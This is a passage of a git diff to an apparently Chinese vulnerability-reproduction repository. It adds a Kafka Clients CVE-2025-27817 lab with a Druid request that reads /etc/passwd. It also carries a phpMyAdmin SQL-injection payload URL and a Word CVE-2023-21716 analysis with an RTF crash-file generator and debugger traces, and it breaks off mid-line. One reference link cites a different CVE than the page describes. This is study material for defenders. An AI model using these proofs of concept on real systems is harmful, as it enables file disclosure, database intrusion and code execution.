diff --git a/README.md b/README.md index b5a88f8..a1e5abe 100644 --- a/README.md +++ b/README.md @@ -583,6 +583,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito * Apache HTTPd 路径穿越漏洞 CVE-2021-41773 * Apache HTTPd 路径穿越漏洞 CVE-2021-42013 * Apache Kafka Clients LDAP注入漏洞 CVE-2023-25194 + * Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817 * Apache Kylin config 未授权配置泄露 CVE-2020-13937 * Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956 * Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925 @@ -792,6 +793,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito * Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980 * Apache Commons Text 远程代码执行漏洞 CVE-2022-42889 + * Apache Dubbo Hessian 反序列化漏洞 CVE-2020-1948 * Apache Dubbo Java反序列化漏洞 CVE-2019-17564 * Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518 * Apache Flink 目录遍历漏洞 CVE-2020-17519 diff --git a/Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md b/Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md index 483f0d2..f5b3509 100644 --- a/Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md +++ b/Web应用漏洞/phpMyAdmin后台SQL注入 CVE-2020-26935.md 
@@ -1,19 +1,19 @@ -# phpMyAdmin后台SQL注入 CVE-2020-26935 - -## 漏洞描述 - -在4.9.6之前的phpMyAdmin和5.0.3之前的5.x的SearchController中发现一个问题。在phpMyAdmin如何处理搜索功能中的SQL语句中发现了一个SQL注入漏洞。攻击者可以利用此漏洞将恶意SQL注入查询。 - -参考链接: - -- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935 -- https://xz.aliyun.com/t/8524 - -## 漏洞复现 - -payload: - -``` -http://127.0.0.1/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1) -``` - +# phpMyAdmin后台SQL注入 CVE-2020-26935 + +## 漏洞描述 + +在4.9.6之前的phpMyAdmin和5.0.3之前的5.x的SearchController中发现一个问题。在phpMyAdmin如何处理搜索功能中的SQL语句中发现了一个SQL注入漏洞。攻击者可以利用此漏洞将恶意SQL注入查询。 + +参考链接: + +- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935 +- https://xz.aliyun.com/t/8524 + +## 漏洞复现 + +payload: + +``` +http://127.0.0.1/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1) +``` + diff --git a/中间件漏洞/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817.md b/中间件漏洞/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817.md new file mode 100644 index 0000000..46cc4a8 --- /dev/null +++ b/中间件漏洞/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817.md 
@@ -0,0 +1,108 @@ +# Apache Kafka Clients 任意文件读取与 SSRF 漏洞 CVE-2025-27817 + +## 漏洞描述 + +Apache Kafka 客户端接受用于设置与代理服务器的 `SASL/OAUTHBEARER` 连接的配置数据,包括 `sasl.oauthbearer.token.endpoint.url` 和 `sasl.oauthbearer.jwks.endpoint.url`。Apache Kafka 允许客户端读取任意文件并将内容返回到错误日志中,或将请求发送到非预期位置。如果在应用程序中,Apache Kafka 客户端配置可由不受信任方指定,攻击者可能会使用 `sasl.oauthbearer.token.endpoint.url` 和 `sasl.oauthbearer.jwks.endpoint.url` 配置读取磁盘和环境变量中的任意内容,或向非预期位置发出请求。 + +参考链接: + +- https://www.openwall.com/lists/oss-security/2025/06/09/1 +- https://kafka.apache.org/cve-list +- https://www.cve.org/CVERecord?id=CVE-2025-27818 + +## 漏洞影响 + +``` +3.1.0 <= Apache Kafka Client <= 3.9.0 +``` + +## 环境搭建 + +docker-compose.yml + +``` +version: '2' +services: + web: + image: vulhub/apache-druid:25.0.0 + ports: + - "8888:8888" +``` + +执行如下命令启动一个 Apache Druid 25.0.0 服务,其内部使用的 kafka-clients 版本是 3.3.1: + +``` +docker-compose up -d +``` + +服务启动后,访问 `http://your-ip:8888` 即可查看到 Apache Druid 主页。 + +![](images/Apache%20Kafka%20Clients%20任意文件读取与SSRF%20漏洞%20CVE-2025-27817/image-20250613161826759.png) + +## 漏洞复现 + +读取 `/etc/passwd`: + +``` +POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 +Host: your-ip:8888 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Accept: */* +Referer: http://your-ip:8888/unified-console.html +Accept-Encoding: gzip, deflate +Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 +Content-Type: application/json + +{ + "type": "kafka", + "spec": { + "type": "kafka", + "ioConfig": { + "type": "kafka", + "consumerProperties": { + "bootstrap.servers": "127.0.0.1:6666", + "sasl.mechanism": "OAUTHBEARER", + "security.protocol": "SASL_SSL", + "sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler", + "sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd", + "sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required 
sasl.oauthbearer.token.endpoint.url=\"http://127.0.0.1:9999/token\" sasl.oauthbearer.jwks.endpoint.url=\"http://127.0.0.1:9999/jwks\" sasl.oauthbearer.client.id=your-client-id sasl.oauthbearer.client.secret=your-client-secret sasl.oauthbearer.expected.audience=kafka sasl.oauthbearer.expected.issuer=\"http://127.0.0.1:9999\" useFirstPass=true serviceName=kafka debug=true;" + }, + "topic": "test", + "useEarliestOffset": true, + "inputFormat": { + "type": "regex", + "pattern": "([\\s\\S]*)", + "listDelimiter": "", + "columns": ["raw"] + } + }, + "dataSchema": { + "dataSource": "sample", + "timestampSpec": { + "column": "!!!_no_such_column_!!!", + "missingValue": "1970-01-01T00:00:00Z" + }, + "dimensionsSpec": {}, + "granularitySpec": { + "rollup": false + } + }, + "tuningConfig": { + "type": "kafka" + } + }, + "samplerConfig": { + "numRows": 500, + "timeoutMs": 15000 + } +} +``` + +![](images/Apache%20Kafka%20Clients%20任意文件读取与SSRF%20漏洞%20CVE-2025-27817/image-20250613162007132.png) + +## 漏洞修复 + +更新至最新版本。自 Apache Kafka 3.9.1/4.0.0 版本起,添加了一个系统属性 `-Dorg.apache.kafka.sasl.oauthbearer.allowed.urls`,用于在 SASL JAAS 配置中设置允许的 URL。 + +- 在 3.9.1 版本中,为了向后兼容,它默认接受所有 URL。 +- 在 4.0.0 及更新版本中,默认值为空列表,用户必须明确设置允许的 URL。 diff --git a/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613161826759.png b/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613161826759.png new file mode 100644 index 0000000..9f11077 Binary files /dev/null and b/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613161826759.png differ diff --git a/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613162007132.png b/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613162007132.png new file mode 100644 index 0000000..b6807b3 Binary files /dev/null and b/中间件漏洞/images/Apache Kafka Clients 任意文件读取与SSRF 漏洞 CVE-2025-27817/image-20250613162007132.png differ 
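Review bot: The third reference link points at CVE-2025-27818 while the title, description and affected-version range all describe CVE-2025-27817; unless the sibling advisory is deliberately cited, it should read `- https://www.cve.org/CVERecord?id=CVE-2025-27817` (and if 27818 is meant as the related JAAS-config issue, say so next to the link). In the PoC, `sasl.oauthbearer.token.endpoint.url` is set to `file:///etc/passwd` in `consumerProperties` while the `sasl.jaas.config` string sets the same key to `http://127.0.0.1:9999/token`, and the text does not say which value the login callback handler honours or where the file contents can be observed (the description says the error log, the PoC only shows a screenshot) — one sentence on that would make the reproduction self-contained. The 漏洞修复 section could also state plainly that upgrading to 3.9.1 alone does not close the issue, since the allowlist there accepts every URL by default: `-Dorg.apache.kafka.sasl.oauthbearer.allowed.urls` must be set explicitly on 3.9.1, whereas 4.0.0+ rejects unlisted URLs out of the box.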
diff --git a/其他漏洞/Microsoft Word 远程代码执行漏洞 CVE-2023-21716.md b/其他漏洞/Microsoft Word 远程代码执行漏洞 CVE-2023-21716.md index 2392c76..772de9a 100644 --- a/其他漏洞/Microsoft Word 远程代码执行漏洞 CVE-2023-21716.md +++ b/其他漏洞/Microsoft Word 远程代码执行漏洞 CVE-2023-21716.md 
@@ -1,257 +1,257 @@ -# Microsoft Word 远程代码执行漏洞 CVE-2023-21716 - -## 漏洞描述 - -Microsoft Office Word是微软公司的一个文字处理器应用程序。Word给用户提供了用于创建专业而优雅的文档工具。 - -该漏洞存在于Microsoft Word的RTF解析器(wwlib)中,是一个远程代码执行漏洞,攻击者可以制作包含过多字体表项的RTF文件,并诱导用户打开来利用此漏洞。攻击者可利用多种方式诱导用户下载并打开特制文档,如电子邮件、即时消息等等。用户使用预览窗格也会触发此漏洞。成功利用此漏洞可能在目标系统上以该用户权限执行代码。 - -近日漏洞发现者 Joshua J. Drake 公布了漏洞的 POC。 - -参考链接: - -- https://qoop.org/publications/cve-2023-21716-rtf-fonttbl.md - -## 分析环境 - -``` -Windows 10 x64 1607 -Office 2016,Windbg,IDA Pro 7.5 -wwlib(16.0.4266.1003) -``` - -## 漏洞复现 - -POC.rtf 使用 Joshua J. Drake 提供的 python 脚本生成。 - -``` -import sys -open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) -``` - -POC.rtf 的内容较为简单,仅包括 \rtfN、\fonttbl、\fN 和 \rtlch 控制字,此次漏洞发生在 rtf 解释器 wwlib 模块处理 \fonttbl 和 \fN 控制字时,POC.rtf 内容如下。 - -``` -{\rtf1{ -{\fonttbl{\f0A;} -{\f1A;} -{\f2A;} -{\f3A;} -{\f4A;} -{\f5A;} -{\f6A;} -... -{\f32755A;} -{\f32756A;} -{\f32757A;} -{\f32758A;} -{\f32759A;} -{\f32760A;} -} -{\rtlch no crash??} -}} -``` - -对 winword.exe 开启页堆,可以得到以下的栈回溯。 - -``` -(c70.dc): Access violation - code c0000005 (first chance) -First chance exceptions are reported before any exception handling. -This exception may be expected and handled. -eax=006f23ac ebx=00000001 ecx=000004e4 edx=ffff7ffc esi=362ceff0 edi=00008002 -eip=6abb00d5 esp=006f2304 ebp=006f2310 iopl=0 nv up ei pl nz na pe nc -cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 -wwlib!PTLS7::FsUpdateFinitePage+0x7635a: -6abb00d5 66894c5604 mov word ptr [esi+edx*2+4],cx ds:002b:362befec=???? -0:000> kv - # ChildEBP RetAddr Args to Child -WARNING: Stack unwind information not available. Following frames may be wrong. 
-00 006f2310 6abaa3ef 17da1268 00007ff8 006f238c wwlib!PTLS7::FsUpdateFinitePage+0x7635a -01 006f51e8 6aba651c 17da1230 006f555c 0005d400 wwlib!PTLS7::FsUpdateFinitePage+0x70674 -02 006f579c 6aef05ac 17da1230 006f57dc 00000070 wwlib!PTLS7::FsUpdateFinitePage+0x6c7a1 -03 006f5bec 6aeeffb5 0000000b 17da1230 17da1264 wwlib!PTLS7::LsDestroyContext+0x246427 -04 006f5e40 6aa4a593 0000000b 04012000 40280000 wwlib!PTLS7::LsDestroyContext+0x245e30 -05 006f772c 6a9068ef 0000000b 00000000 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x17494 -06 006f7c54 6aa654ed 006f8530 00000001 00000000 wwlib!PTLS7::LsAssert+0x2bd1c -07 006f905c 6aa63d3b 006f93f0 006f93e8 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x323ee -08 006f90e0 6b56be52 006f93f0 006f93e8 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x30c3c -09 006fa66c 6ae6013a 006fa6c8 00000824 00000000 wwlib!wdGetApplicationObject+0xdf8a0 -0a 006fb718 6aca4e9e 006ff990 ffffffff 00000001 wwlib!PTLS7::LsDestroyContext+0x1b5fb5 -0b 006fb948 6a8ceb47 7668a200 6a8c0000 00000001 wwlib!PTLS7::LsQueryLineUp+0x41cf1 -0c 006fb978 6a8ce971 0000000a 00430022 005c003a wwlib!FMain+0x273 -0d 006ff9fc 6a8ce906 0000000a 6a8ce8d4 006ffa30 wwlib!FMain+0x9d -0e 006ffa0c 00141762 00140000 00000000 02fbefd4 wwlib!FMain+0x32 -0f 006ffa30 00141194 00140000 00000000 02fbefd4 winword+0x1762 -10 006ffa7c 766862c4 0045c000 766862a0 1455d81a winword+0x1194 -11 006ffa90 77ed0609 0045c000 6d907d52 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo]) -12 006ffad8 77ed05d4 ffffffff 77ef2523 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH]) -13 006ffae8 00000000 00141000 0045c000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) -``` - -通过栈回溯得到以下调用链,由于没有 wwlib.dll 模块的符号只简单的揣测了一下几个关键函数的作用。 - -![image-20230314102008169](images/image-20230314102008169.png) - -## 漏洞分析 - -查看 crash func(sub_102F0020) 及崩溃地址处的上下文,经过一番调试摸清了 sub_102F0020 函数的参数意义和崩溃原因。 - -sub_102F0020 函数用于处理 fond id 也就是 /fN 中的 N,其会将 fond id 和 codepage value 存储在一个由 Cum 和 Base 计算偏移的地址上。Base 
的初始值是 0xa,且每当处理了 0xa 个 fond id 就会累加 0xa。 - -![图片](images/640.png) - -存储 fond id 和 codepage value 的代码片段同时也是 crash 时的上下文。 - -``` -.text:102F00A2 movsx eax, word ptr [esi]//获得 Cum -.text:102F00A5 mov ecx, [ebp+arg_4]//获得 fond id -.text:102F00A8 mov [esi+eax*2+4], cx//存储 fond id <---- bp1 -.text:102F00AD movsx eax, word ptr [esi+2] -.text:102F00B1 movsx ecx, word ptr [esi] -.text:102F00B4 add ecx, eax -.text:102F00B6 mov eax, [ebp+arg_8] -.text:102F00B9 mov ax, [eax] -.text:102F00BC mov [esi+ecx*2+4], ax -.text:102F00C1 mov eax, [ebp+arg_10] -.text:102F00C4 test eax, eax -.text:102F00C6 jz short loc_102F00DA -.text:102F00C8 movsx ecx, word ptr [esi]//获得 Cum -.text:102F00CB movsx edx, word ptr [esi+2]//获得 Base <---- bp2 -.text:102F00CF lea edx, [ecx+edx*2]//计算偏移 <---- bp3 -.text:102F00D2 mov cx, [eax]//获得 codepage value -.text:102F00D5 mov [esi+edx*2+4], cx//存储 codepage value <---- bp4 <- crash -.text:102F00DA inc word ptr [esi]//增加 Cum 计数 -``` - -在上述代码片段中下 4 个断点查看存储过程,注意各寄存器对应关系。 - -``` -bp wwlib+2F00A8 ".printf \" Cum: %p Font id: %p Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", eax,ecx,(esi+eax*2+4),esi,eax; gc" -bp wwlib+2F00CB ".printf \" Base: %p \\n \", poi(esi+2); gc" -bp wwlib+2F00CF ".printf \" Edx: %p from 0x%x + 0x%x*2\\n \", (ecx + edx*2),ecx,edx; gc" -bp wwlib+2F00D5 ".printf \" Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", (esi+edx*2+4),esi,edx; gc" -``` - -崩溃前断点记录到的存储过程信息。 - -``` - ... 
- --------------------------------------------------------------------------------------- - Cum: 00007fec Font id: 00007fec Target addr: 3b3e0044 from 0x3b3d0068 + 0x7fec*2 + 4 - Base: 00007fee - Edx: 00017fc8 from 0x7fec + 0x7fee*2 - Target addr: 3b3ffffc from 0x3b3d0068 + 0x17fc8*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007fed Font id: 00007fed Target addr: 3b3e0046 from 0x3b3d0068 + 0x7fed*2 + 4 - Base: 00007fee - Edx: 00017fc9 from 0x7fed + 0x7fee*2 - Target addr: 3b3ffffe from 0x3b3d0068 + 0x17fc9*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007fee Font id: 00007fee Target addr: 3e538008 from 0x3e528028 + 0x7fee*2 + 4 - Base: 00007ff8 - Edx: 00017fde from 0x7fee + 0x7ff8*2 - Target addr: 3e557fe8 from 0x3e528028 + 0x17fde*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007fef Font id: 00007fef Target addr: 3e53800a from 0x3e528028 + 0x7fef*2 + 4 - Base: 00007ff8 - Edx: 00017fdf from 0x7fef + 0x7ff8*2 - Target addr: 3e557fea from 0x3e528028 + 0x17fdf*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff0 Font id: 00007ff0 Target addr: 3e53800c from 0x3e528028 + 0x7ff0*2 + 4 - Base: 00007ff8 - Edx: 00017fe0 from 0x7ff0 + 0x7ff8*2 - Target addr: 3e557fec from 0x3e528028 + 0x17fe0*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff1 Font id: 00007ff1 Target addr: 3e53800e from 0x3e528028 + 0x7ff1*2 + 4 - Base: 00007ff8 - Edx: 00017fe1 from 0x7ff1 + 0x7ff8*2 - Target addr: 3e557fee from 0x3e528028 + 0x17fe1*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff2 Font id: 00007ff2 Target addr: 3e538010 from 0x3e528028 + 0x7ff2*2 + 4 - Base: 00007ff8 - Edx: 00017fe2 from 0x7ff2 + 0x7ff8*2 - Target addr: 3e557ff0 from 
0x3e528028 + 0x17fe2*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff3 Font id: 00007ff3 Target addr: 3e538012 from 0x3e528028 + 0x7ff3*2 + 4 - Base: 00007ff8 - Edx: 00017fe3 from 0x7ff3 + 0x7ff8*2 - Target addr: 3e557ff2 from 0x3e528028 + 0x17fe3*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff4 Font id: 00007ff4 Target addr: 3e538014 from 0x3e528028 + 0x7ff4*2 + 4 - Base: 00007ff8 - Edx: 00017fe4 from 0x7ff4 + 0x7ff8*2 - Target addr: 3e557ff4 from 0x3e528028 + 0x17fe4*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff5 Font id: 00007ff5 Target addr: 3e538016 from 0x3e528028 + 0x7ff5*2 + 4 - Base: 00007ff8 - Edx: 00017fe5 from 0x7ff5 + 0x7ff8*2 - Target addr: 3e557ff6 from 0x3e528028 + 0x17fe5*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff6 Font id: 00007ff6 Target addr: 3e538018 from 0x3e528028 + 0x7ff6*2 + 4 - Base: 00007ff8 - Edx: 00017fe6 from 0x7ff6 + 0x7ff8*2 - Target addr: 3e557ff8 from 0x3e528028 + 0x17fe6*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff7 Font id: 00007ff7 Target addr: 3e53801a from 0x3e528028 + 0x7ff7*2 + 4 - Base: 00007ff8 - Edx: 00017fe7 from 0x7ff7 + 0x7ff8*2 - Target addr: 3e557ffa from 0x3e528028 + 0x17fe7*2 + 4 - --------------------------------------------------------------------------------------- - Cum: 00007ff8 Font id: 00007ff8 Target addr: 362defe4 from 0x362ceff0 + 0x7ff8*2 + 4 - Base: 00008002 - Edx: ffff7ffc from 0x7ff8 + 0xffff8002*2 - Target addr: 362befec from 0x362ceff0 + 0xffff7ffc*2 + 4 -``` - -观察记录及断点处的汇编代码,发现崩溃是由 bp2 处的 movsx 指令引起的整数溢出导致。 - -![图片](images/640-16787604735695.png) - -由上图中的记录 2 可以发现,bp2 处获得的 Base 由 0x8002 变为了 edx 中的 0xffff8002,变化的原因是 movsx 指令是带符号扩展的,而 0x8002 的最高位又恰好为 1。这也就导致 bp3 处的 edx 和 bp4 处的 
Target addr 整数溢出,并最终在 bp4 处发生堆损坏。 - -![图片](images/640-16787604818848.jpeg) - -Target addr 整数溢出。 - -![图片](images/640-167876049401111.jpeg) - -## 补丁分析 - -将 Office 更新到最新后再次打开 POC.rtf 发现依然会造成崩溃,不过此崩溃是 winword.exe 提前检测到即将造成堆损坏而主动引发的,另外发现微软提供了此版本 wwlib.dll 的符号文件,此栈回溯与之前的基本一致。 - -``` -(174c.149c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) -eax=00008002 ebx=00007ff8 ecx=00000005 edx=ffffffff esi=7e221028 edi=00007ff8 -eip=6cccec57 esp=004f10f4 ebp=004f110c iopl=0 nv up ei pl nz ac pe nc -cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 -wwlib!FSearchFtcmap+0x182: -6cccec57 cd29 int 29h -0:000> kv - # ChildEBP RetAddr Args to Child -00 004f110c 6d9f1494 004f119c 00000001 004f1188 wwlib!FSearchFtcmap+0x182 (FPO: [Non-Fpo]) -01 004f35d8 6d9e347e bb594bde 1c597028 0005d400 wwlib!RtfInRare+0x1848 (FPO: [Non-Fpo]) -02 004f3a0c 6d9ff40f 00000070 1c597028 505daa50 wwlib!CchRtfInCore+0x28df (FPO: [Non-Fpo]) -03 004f3c5c 6d9fecc4 1c59702c 004fa0d0 004f5a60 wwlib!RtfGetChars+0x183 (FPO: [Non-Fpo]) -04 004f3ca8 6c97a74a 40280000 00200002 56b28f10 wwlib!PdodCreateRtf+0x177 (FPO: [6,13,4]) -05 004f5404 6c528610 04012000 20280000 00200002 wwlib!`Mso::Details::SharedMutexPool::Get'::`2'::`dynamic atexit destructor for 's_mutexPool''+0x15be8d -06 004f5758 6c52829b 00000000 ffffffff 00000000 wwlib!PdodCreatePfnCore+0x33a (FPO: [Non-Fpo]) -07 004f57dc 6c504161 00000000 ffffffff 00000000 wwlib!PdodCreatePfnBPPaapWithEdpi+0x75 (FPO: [18,3,4]) -08 004f8df4 6c5001b5 04012000 00000000 00000002 wwlib!PdodOpenFnmCore2+0x22eb (FPO: [Non-Fpo]) -09 004f8ebc 6d2d3628 04012000 00000000 00000002 wwlib!PdodOpenFnmCore+0xb9 (FPO: [15,30,0]) -0a 004f9fe8 6d2d332e 00000000 00000000 00000002 wwlib!FFileOpenXszCore+0x2e7 (FPO: [Non-Fpo]) -0b 004fa024 6c7b525d 00000000 00000000 00000002 wwlib!FFileOpenXstzCore+0x3d (FPO: [6,4,0]) -0c 004fb4c4 6c3cc272 00000001 00000000 6c3cc22c wwlib!IfrInitArgs+0x7ef (FPO: [Non-Fpo]) -0d 004fb6fc 6c309720 bb59c6ba 
74cda210 0000000a wwlib!Boot::IfrParseCommandLine2+0x46 (FPO: [Non-Fpo]) -0e 004fb774 6c309542 004fb7a4 6c300000 6c309234 wwlib!Boot::FRun+0xb4 (FPO: [Non-Fpo]) -0f 004ff830 6c309298 83385031 00000540 bb5989b6 wwlib!FWordBoot+0x5a (FPO: [Non-Fpo]) -10 004ff864 00941917 00940000 00000000 0000000a wwlib!FMain+0x64 (FPO: [Non-Fpo]) -11 004ffab4 0094114a 00940000 00000000 0077efd4 winword!WinMain+0x146 (FPO: [Non-Fpo]) -12 004ffb00 74cd62c4 003e5000 74cd62a0 454ba229 winword!std::_Deallocate<8,0>+0x1e3 (FPO: [Non-Fpo]) -13 004ffb14 77ae0fa9 003e5000 11605f5b 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo]) -14 004ffb5c 77ae0f74 ffffffff 77b02ed1 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH]) -15 004ffb6c 00000000 00941000 003e5000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) -``` - -补丁文件中新增的范围检测。 - +# Microsoft Word 远程代码执行漏洞 CVE-2023-21716 + +## 漏洞描述 + +Microsoft Office Word是微软公司的一个文字处理器应用程序。Word给用户提供了用于创建专业而优雅的文档工具。 + +该漏洞存在于Microsoft Word的RTF解析器(wwlib)中,是一个远程代码执行漏洞,攻击者可以制作包含过多字体表项的RTF文件,并诱导用户打开来利用此漏洞。攻击者可利用多种方式诱导用户下载并打开特制文档,如电子邮件、即时消息等等。用户使用预览窗格也会触发此漏洞。成功利用此漏洞可能在目标系统上以该用户权限执行代码。 + +近日漏洞发现者 Joshua J. Drake 公布了漏洞的 POC。 + +参考链接: + +- https://qoop.org/publications/cve-2023-21716-rtf-fonttbl.md + +## 分析环境 + +``` +Windows 10 x64 1607 +Office 2016,Windbg,IDA Pro 7.5 +wwlib(16.0.4266.1003) +``` + +## 漏洞复现 + +POC.rtf 使用 Joshua J. Drake 提供的 python 脚本生成。 + +``` +import sys +open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) +``` + +POC.rtf 的内容较为简单,仅包括 \rtfN、\fonttbl、\fN 和 \rtlch 控制字,此次漏洞发生在 rtf 解释器 wwlib 模块处理 \fonttbl 和 \fN 控制字时,POC.rtf 内容如下。 + +``` +{\rtf1{ +{\fonttbl{\f0A;} +{\f1A;} +{\f2A;} +{\f3A;} +{\f4A;} +{\f5A;} +{\f6A;} +... 
+{\f32755A;} +{\f32756A;} +{\f32757A;} +{\f32758A;} +{\f32759A;} +{\f32760A;} +} +{\rtlch no crash??} +}} +``` + +对 winword.exe 开启页堆,可以得到以下的栈回溯。 + +``` +(c70.dc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=006f23ac ebx=00000001 ecx=000004e4 edx=ffff7ffc esi=362ceff0 edi=00008002 +eip=6abb00d5 esp=006f2304 ebp=006f2310 iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +wwlib!PTLS7::FsUpdateFinitePage+0x7635a: +6abb00d5 66894c5604 mov word ptr [esi+edx*2+4],cx ds:002b:362befec=???? +0:000> kv + # ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +00 006f2310 6abaa3ef 17da1268 00007ff8 006f238c wwlib!PTLS7::FsUpdateFinitePage+0x7635a +01 006f51e8 6aba651c 17da1230 006f555c 0005d400 wwlib!PTLS7::FsUpdateFinitePage+0x70674 +02 006f579c 6aef05ac 17da1230 006f57dc 00000070 wwlib!PTLS7::FsUpdateFinitePage+0x6c7a1 +03 006f5bec 6aeeffb5 0000000b 17da1230 17da1264 wwlib!PTLS7::LsDestroyContext+0x246427 +04 006f5e40 6aa4a593 0000000b 04012000 40280000 wwlib!PTLS7::LsDestroyContext+0x245e30 +05 006f772c 6a9068ef 0000000b 00000000 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x17494 +06 006f7c54 6aa654ed 006f8530 00000001 00000000 wwlib!PTLS7::LsAssert+0x2bd1c +07 006f905c 6aa63d3b 006f93f0 006f93e8 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x323ee +08 006f90e0 6b56be52 006f93f0 006f93e8 04012000 wwlib!PTLS7::FsUpdateBottomlessPage+0x30c3c +09 006fa66c 6ae6013a 006fa6c8 00000824 00000000 wwlib!wdGetApplicationObject+0xdf8a0 +0a 006fb718 6aca4e9e 006ff990 ffffffff 00000001 wwlib!PTLS7::LsDestroyContext+0x1b5fb5 +0b 006fb948 6a8ceb47 7668a200 6a8c0000 00000001 wwlib!PTLS7::LsQueryLineUp+0x41cf1 +0c 006fb978 6a8ce971 0000000a 00430022 005c003a wwlib!FMain+0x273 +0d 006ff9fc 6a8ce906 0000000a 6a8ce8d4 006ffa30 wwlib!FMain+0x9d +0e 006ffa0c 00141762 
00140000 00000000 02fbefd4 wwlib!FMain+0x32 +0f 006ffa30 00141194 00140000 00000000 02fbefd4 winword+0x1762 +10 006ffa7c 766862c4 0045c000 766862a0 1455d81a winword+0x1194 +11 006ffa90 77ed0609 0045c000 6d907d52 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo]) +12 006ffad8 77ed05d4 ffffffff 77ef2523 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH]) +13 006ffae8 00000000 00141000 0045c000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) +``` + +通过栈回溯得到以下调用链,由于没有 wwlib.dll 模块的符号只简单的揣测了一下几个关键函数的作用。 + +![image-20230314102008169](images/image-20230314102008169.png) + +## 漏洞分析 + +查看 crash func(sub_102F0020) 及崩溃地址处的上下文,经过一番调试摸清了 sub_102F0020 函数的参数意义和崩溃原因。 + +sub_102F0020 函数用于处理 fond id 也就是 /fN 中的 N,其会将 fond id 和 codepage value 存储在一个由 Cum 和 Base 计算偏移的地址上。Base 的初始值是 0xa,且每当处理了 0xa 个 fond id 就会累加 0xa。 + +![图片](images/640.png) + +存储 fond id 和 codepage value 的代码片段同时也是 crash 时的上下文。 + +``` +.text:102F00A2 movsx eax, word ptr [esi]//获得 Cum +.text:102F00A5 mov ecx, [ebp+arg_4]//获得 fond id +.text:102F00A8 mov [esi+eax*2+4], cx//存储 fond id <---- bp1 +.text:102F00AD movsx eax, word ptr [esi+2] +.text:102F00B1 movsx ecx, word ptr [esi] +.text:102F00B4 add ecx, eax +.text:102F00B6 mov eax, [ebp+arg_8] +.text:102F00B9 mov ax, [eax] +.text:102F00BC mov [esi+ecx*2+4], ax +.text:102F00C1 mov eax, [ebp+arg_10] +.text:102F00C4 test 